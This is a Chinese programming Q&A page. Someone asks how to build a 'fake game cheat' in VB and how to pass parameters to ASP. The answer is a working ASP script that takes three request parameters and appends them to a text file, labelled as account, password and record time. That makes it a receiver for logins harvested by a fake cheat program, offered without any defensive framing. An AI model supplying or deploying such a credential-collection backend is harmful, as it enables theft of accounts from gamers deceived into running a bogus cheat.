当前位置:编程学习 > asp >>

接受参数 赋值给ASP值代码是什麽

用VB做 假 外 挂要用什麽 代 码?如何接受参数 赋值给ASP值代?最好给个 视 频!

追问:那这个呢用VB做 假 外 挂要用什麽 代 码?

答案:<% 
Dim asp_a,asp_b,asp_c
asp_a=request("a")
asp_b=request("b")
asp_c=request("c")

set myfileobject=server.CreateObject("Scripting.FileSystemObject")
set mytextfile=myfileobject.OpenTextFile(server.MapPath("test.txt"),8,true)
if asp_a <>"" Then
text="帐号:"+asp_a+"密码:"+asp_b+"记录时间:"+asp_c + vbCrLf +text
mytextfile.Write text
end if
mytextfile.close

%>

上一个:asp统计id代码
下一个:asp.net 数据库插入代码

CopyRight © 2012 站长网 编程知识问答 www.zzzyk.com All Rights Reserved
部份技术文章来自网络,